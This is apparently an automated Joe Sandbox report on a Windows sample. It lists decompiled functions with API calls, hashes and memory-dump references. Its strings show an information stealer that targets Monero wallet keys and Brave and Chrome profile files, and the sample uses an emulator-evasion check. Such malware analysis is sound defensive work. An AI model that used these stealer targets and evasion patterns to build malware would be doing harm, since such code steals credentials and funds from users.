                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                                • Instruction ID: af00ef862b9f4821313cfb74156a62dc8a62f7e4c2d6f27e3e4e0d1f47adc1bf
                                • Opcode Fuzzy Hash: 910729ec885d01e5db45a89b31fa29d53da6f053641ea5eca30f0673f6b963aa
                                • Instruction Fuzzy Hash: 9D0162B1944208EBDB10DF94DD45FAAFBB8F704B21F10421AEA45E3280C37859048BB5
                                Function 00541110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0054112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00541132
                                • ExitProcess.KERNEL32 ref: 00541143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                                • Instruction ID: f3aa8f6f6cf297fe64ee3c59b72add0a5333aaa336e3f832f5311aad4c58ff13
                                • Opcode Fuzzy Hash: 7af9bf6c0ac28963557f33437c13db63d18867a43fc4116bb1e7e72c516f065e
                                • Instruction Fuzzy Hash: 30E0E670985308FBF710ABA19C0EB497A78AB04B45F204055F709761D0D6B92640979E
                                Function 005410A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 005410B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 005410F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                                • Instruction ID: ad979e7d54e63171e9091120d29bd7897c341c9a54eab0ca3def99d3140d439e
                                • Opcode Fuzzy Hash: e6cce850ca3eed1319afbcef3d5f966760a28840acec9b5918748529258167db
                                • Instruction Fuzzy Hash: 5AF0E271681208BBE7149AA4AC5DFBABBE8E705B15F304449F904E3280D5719F40DBA8
                                Function 00541190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 005578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00557910
                                  • Part of subcall function 005578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00557917
                                  • Part of subcall function 005578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0055792F
                                  • Part of subcall function 00557850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005411B7), ref: 00557880
                                  • Part of subcall function 00557850: RtlAllocateHeap.NTDLL(00000000), ref: 00557887
                                  • Part of subcall function 00557850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0055789F
                                • ExitProcess.KERNEL32 ref: 005411C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                                • Instruction ID: b55363fb87426da481e92bb1159e7fbf36ff10ec0fb6d647fcb5b2724e286043
                                • Opcode Fuzzy Hash: 4f1449074fbab0fb4df5f5a12fe37fe0ac94036dbb1418a4e87fc056800d1ac0
                                • Instruction Fuzzy Hash: 9CE0ECB595420663DA0073B0BC1EB2A3A9C7B5434AF144426BE0592502FE29E854866E

                                Non-executed Functions

                                Function 005538B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 005538CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 005538E3
                                • lstrcat.KERNEL32(?,?), ref: 00553935
                                • StrCmpCA.SHLWAPI(?,00560F70), ref: 00553947
                                • StrCmpCA.SHLWAPI(?,00560F74), ref: 0055395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00553C67
                                • FindClose.KERNEL32(000000FF), ref: 00553C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                                • Instruction ID: ee6726cd8cc635dd126b556541277f79f90b32a300dd20c78184e5c2eacc45f4
                                • Opcode Fuzzy Hash: 788b62a7736fc9f0f9d05a592ea60876c2f86300ff96b8e1f84385fe2657cccc
                                • Instruction Fuzzy Hash: CDA154B1A40209ABDB24DF64DC99FFE7778BF84301F048589B90D96141EB759B88CF62
                                Function 0054BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • FindFirstFileA.KERNEL32(00000000,?,00560B32,00560B2B,00000000,?,?,?,005613F4,00560B2A), ref: 0054BEF5
                                • StrCmpCA.SHLWAPI(?,005613F8), ref: 0054BF4D
                                • StrCmpCA.SHLWAPI(?,005613FC), ref: 0054BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0054C7BF
                                • FindClose.KERNEL32(000000FF), ref: 0054C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                                • Instruction ID: a376b533160e8361919a632a0eec6438eb9fd25761e526e0633f112b21ee6eaa
                                • Opcode Fuzzy Hash: 65a91ef4e41134e64d14be6a2c096153fe332c1e712076cb176fdc1662b760c5
                                • Instruction Fuzzy Hash: 74425572910105ABDB14FB70DD6AEED7B3CBBC4301F408659B90697191EE34AB4DCB92
                                Function 00554910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 0055492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00554943
                                • StrCmpCA.SHLWAPI(?,00560FDC), ref: 00554971
                                • StrCmpCA.SHLWAPI(?,00560FE0), ref: 00554987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00554B7D
                                • FindClose.KERNEL32(000000FF), ref: 00554B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                                • Instruction ID: 25c70a7144cb8ea6f54f23c9828e767d37f53b59e1e27ec353f2f192a2948708
                                • Opcode Fuzzy Hash: 04333ad11347fc0ef541f071beec22bdc498b558ccadcaff337a05f21e8f1590
                                • Instruction Fuzzy Hash: 4A6188B1900219BBDB20EFA0DC59FEA777CBB48701F048589F50996140EB74EB89CFA5
                                Function 00554570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00554580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00554587
                                • wsprintfA.USER32 ref: 005545A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 005545BD
                                • StrCmpCA.SHLWAPI(?,00560FC4), ref: 005545EB
                                • StrCmpCA.SHLWAPI(?,00560FC8), ref: 00554601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0055468B
                                • FindClose.KERNEL32(000000FF), ref: 005546A0
                                • lstrcat.KERNEL32(?,0107F5C8), ref: 005546C5
                                • lstrcat.KERNEL32(?,0107EA78), ref: 005546D8
                                • lstrlen.KERNEL32(?), ref: 005546E5
                                • lstrlen.KERNEL32(?), ref: 005546F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                                • Instruction ID: d84d3b38120dc258fe4cb8ce6034e4e2a78415416661d8be6979e32facc4e920
                                • Opcode Fuzzy Hash: e9e4c2080c383325aa0f174e275d71741ed6d9e5128f18c9a4716fb2cb39c1e4
                                • Instruction Fuzzy Hash: 1C518AB1550218ABD720EB70DC99FEE777CBB58301F408589F60992190EB789BC8CFA5
                                Function 00553EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00553EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00553EDA
                                • StrCmpCA.SHLWAPI(?,00560FAC), ref: 00553F08
                                • StrCmpCA.SHLWAPI(?,00560FB0), ref: 00553F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0055406C
                                • FindClose.KERNEL32(000000FF), ref: 00554081
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                                • Instruction ID: 3a2c943eeae5c1b31f3e56dc2bf6dc11c673c420c55e6ef6cc633be02eb5b601
                                • Opcode Fuzzy Hash: 5be10a7a47545d9d5a4ddb7ed8d6ecca863d1e697075e10f3d1d992c0c69e382
                                • Instruction Fuzzy Hash: 73518EB1500219BBDB24FBB0DC59EFA777CBB44301F008589B65996040DB79EB89CF65
                                Function 0054ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 0054ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 0054ED55
                                • StrCmpCA.SHLWAPI(?,00561538), ref: 0054EDAB
                                • StrCmpCA.SHLWAPI(?,0056153C), ref: 0054EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0054F2AE
                                • FindClose.KERNEL32(000000FF), ref: 0054F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.0000000000622000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.000000000078A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.000000000079E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.00000000009F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A26000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823548638.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824067489.0000000000A36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824232792.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1824294068.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_540000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                                • Instruction ID: 486ff4cc767123a5fac0bb584b301631ae7ed16b74af6591e34bbe1b86cb7b05
                                • Opcode Fuzzy Hash: a333c05285d4963d55e2d798cbccf320a711b56104f115c23e3c14cec2014cfe
                                • Instruction Fuzzy Hash: 8DE106729111195AEB54FB60CC66EEE7B38BF94301F40429AB90B62452EF306F8ECF51
                                Function 0054F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                                  • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                                  • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                                  • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,0107A078,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                                  • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                                  • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                                  • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005615B8,00560D96), ref: 0054F71E
                                • StrCmpCA.SHLWAPI(?,005615BC), ref: 0054F76F
                                • StrCmpCA.SHLWAPI(?,005615C0), ref: 0054F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0054FAB1
                                • FindClose.KERNEL32(000000FF), ref: 0054FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1823359217.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                                • Associated: 00000000.00000002.1823325782.0000000000540000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1823359217.00000000005F1000.00000040.00000001.01000000.00000003.sdmpDownload File
